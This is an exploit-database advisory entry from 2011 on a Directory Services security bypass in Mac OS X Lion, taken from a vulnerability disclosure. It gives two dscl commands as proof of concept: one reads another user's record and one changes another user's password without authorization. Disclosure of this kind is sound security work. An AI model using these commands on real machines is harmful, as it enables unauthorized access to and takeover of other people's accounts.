Apple Mac OSX (Lion) – Directory Services Security Bypass

  • 作者: Defence in Depth
    日期: 2011-09-19
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/36143/
  • source: https://www.securityfocus.com/bid/49676/info
    
    Apple Mac OS X Lion is prone to multiple security-bypass vulnerabilities.
    
    Local attackers can exploit these issues to obtain sensitive information or change the password of other users on the computer, without sufficient privileges. 
    
    $ dscl localhost -read /Search/Users/bob
    
    $ dscl localhost -passwd /Search/Users/<username>